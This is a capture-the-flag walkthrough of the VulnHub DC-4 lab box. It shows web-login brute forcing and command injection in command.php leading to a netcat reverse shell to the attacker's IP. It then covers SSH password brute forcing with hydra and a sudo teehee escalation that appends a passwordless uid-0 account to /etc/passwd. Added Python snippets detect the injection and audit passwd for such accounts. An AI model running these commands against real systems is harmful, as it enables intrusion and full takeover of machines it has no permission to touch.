vulnhub-DC-4

Information gathering

As usual, start with an nmap scan

└─# nmap -A -p1-65535 192.168.20.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 16:22 CST
Nmap scan report for 192.168.20.133
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:4B:72:9D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.61 ms 192.168.20.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.55 seconds

Ports 22 and 80 are both open; the middleware on port 80 is nginx, and this version has no known vulnerabilities

└─# searchsploit nginx 1.15.10       
Exploits: No Results
Shellcodes: No Results

The site is a backend login page. Running sqlmap against it shows it is not SQL injectable

sqlmap -r "1.txt"

Scan for directories

└─# dirsearch -u "http://192.168.20.133/"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/hshdgyq/Desktop/reports/http_192.168.20.133/__24-11-20_16-28-06.txt

Target: http://192.168.20.133/

[16:28:06] Starting:
[16:28:46] 302 - 704B - /command.php -> index.php
[16:28:51] 301 - 170B - /css -> http://192.168.20.133/css/
[16:29:06] 301 - 170B - /images -> http://192.168.20.133/images/
[16:29:06] 403 - 556B - /images/
[16:29:07] 403 - 15B - /index.pHp
[16:29:14] 302 - 206B - /login.php -> index.php
[16:29:15] 302 - 163B - /logout.php -> index.php

Weak password brute force

Nothing there, so try weak passwords (brute-force directly with Burp). After trying, the username turns out to be admin and the password happy; log in.

Arbitrary command execution

There are three options; capturing the request shows that the command is executed directly

POST /command.php HTTP/1.1
Host: 192.168.20.133
Content-Length: 22
Cache-Control: max-age=0
Origin: http://192.168.20.133
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.20.133/command.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=s95fm6tchhvstuea32etfp44q4
Connection: close

radio=ls+-l&submit=Run

Modifying the radio parameter gives command execution. I tried writing a file but it failed, probably due to insufficient permissions, so I went straight for a reverse shell

nc+-e+/bin/sh+192.168.20.129+1111

nc -lvnp 1111

Got a shell

SSH brute force

Next is privilege escalation. We are currently www-data; I tried sudo and SUID, and among the SUID files found a suspicious file belonging to the jim user
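The command.php flaw above is that the radio field is handed to a shell verbatim. As an added example (not code from the original write-up or from the DC-4 target), here is a fixed-argv dispatcher for such a form plus a check that flags raw shell text in the radio field; the option keys and the commands behind them are assumptions.

```python
# Added example, not the target's command.php: map form option keys to fixed argv
# lists and reject anything else. Option keys/commands are assumed stand-ins.
import subprocess
from urllib.parse import parse_qs

ALLOWED_COMMANDS = {
    "list": ["ls", "-l"],      # stand-in for one of the page's three options
    "disk": ["df", "-h"],
    "uptime": ["uptime"],
}

def parse_radio(body: str) -> str:
    """Pull the radio field out of an x-www-form-urlencoded body, e.g. 'radio=ls+-l&submit=Run'."""
    return parse_qs(body, keep_blank_values=True).get("radio", [""])[0]

def select_command(choice: str):
    """Hardened selection: only an allowlisted key maps to an argv; anything else is None."""
    return ALLOWED_COMMANDS.get(choice)

def run_choice(choice: str) -> str:
    """Run the selected argv without a shell, so metacharacters in input are never parsed."""
    argv = select_command(choice)
    if argv is None:
        raise ValueError(f"rejected option: {choice!r}")
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout

def flag_request(body: str) -> bool:
    """Detection side: True when the submitted radio value is not a known option key.
    The page's captured request ('radio=ls -l') is exactly this shape."""
    return select_command(parse_radio(body)) is None
```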

www-data@dc-4:/usr/share/nginx/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh

Look at jim's home directory and the suspicious file

www-data@dc-4:/usr/share/nginx/html$ cd /home/jim     
cd /home/jim
www-data@dc-4:/home/jim$ ls
ls
backups mbox test.sh
www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."

Not exploitable, but there is also a backups directory

www-data@dc-4:/home/jim$ cd backups
cd backups
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou

There is a password list; this is very likely jim's login password. Brute-force it with hydra

└─# hydra -l jim -P ps.txt ssh://192.168.20.133
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-20 17:25:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.20.133:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 87 to do in 00:01h, 15 active
[22][ssh] host: 192.168.20.133 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-20 17:26:42

Successfully brute-forced the password jibril04; log in

└─# ssh jim@192.168.20.133          
The authenticity of host '192.168.20.133 (192.168.20.133)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.20.133' (ED25519) to the list of known hosts.
jim@192.168.20.133's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backups mbox test.sh

It says there is mail; let's see what it is

jim@dc-4:/var/mail$ cat www-data
cat: www-data: Permission denied
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

OK, another user. We could also check whether jim has sudo (of course not), then log in as Charles

└─# ssh charles@192.168.20.133      
charles@192.168.20.133's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
charles@dc-4:~$ ls
charles@dc-4:~$ ls
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee

teehee privilege escalation

We have sudo, and this is a teehee privesc. teehee is a little-known Linux editor; if we have sudo rights on it, it can be used to escalate privileges

The core idea is to use it to append a user entry with uid 0 to the passwd file

echo "hshdgyq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

Under the Linux user mechanism, if there is no shadow entry and the password field of the passwd entry is empty, you can su to it locally with an empty password. So running su hshdgyq logs in as hshdgyq, and because that user has uid 0, it has root privileges

charles@dc-4:~$ echo "hshdgyq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
hshdgyq::0:0:::/bin/bash
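The appended entry above (extra uid 0, empty password field, no shadow line) is exactly what a passwd integrity check should catch. As an added example, not from the original write-up, this audit parses passwd/shadow text and reports such entries; the sample file contents are constructed, not the target's real files.

```python
# Added example (not the target's files): audit passwd text for planted root accounts
# of the kind the page appends with `sudo teehee -a /etc/passwd`. Constructed samples.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:charles,,,:/home/charles:/bin/bash
hshdgyq::0:0:::/bin/bash
"""
SAMPLE_SHADOW = """root:$6$constructedhash:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
jim:$6$constructedhash:17000:0:99999:7:::
charles:$6$constructedhash:17000:0:99999:7:::
"""

def parse_passwd(text):
    """Split passwd text into dicts; lines without 7 fields or a numeric uid are marked malformed."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            entries.append({"name": fields[0], "malformed": True})
            continue
        name, pw, uid, _gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "home": home, "shell": shell, "malformed": False})
    return entries

def shadow_names(text):
    return {line.split(":", 1)[0] for line in text.splitlines() if line.strip()}

def audit(passwd_text, shadow_text):
    """Return (name, reason) findings for entries that look like backdoor accounts."""
    findings = []
    shadowed = shadow_names(shadow_text)
    for e in parse_passwd(passwd_text):
        if e["malformed"]:
            findings.append((e["name"], "malformed entry"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra uid 0 account"))
        if e["pw"] == "":          # empty field: su needs no password, as the page notes
            findings.append((e["name"], "empty password field"))
        if e["name"] not in shadowed:
            findings.append((e["name"], "no shadow entry"))
    return findings
```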

Here switching directly still asked for a password; going back to the jim user and switching from there required no password

jim@dc-4:/var/mail$ su hshdgyq
root@dc-4:/var/mail# whoami
root

With that, the box is done

Summary

This box is low difficulty; the topics are weak passwords, command execution, teehee privilege escalation and SSH password brute-forcing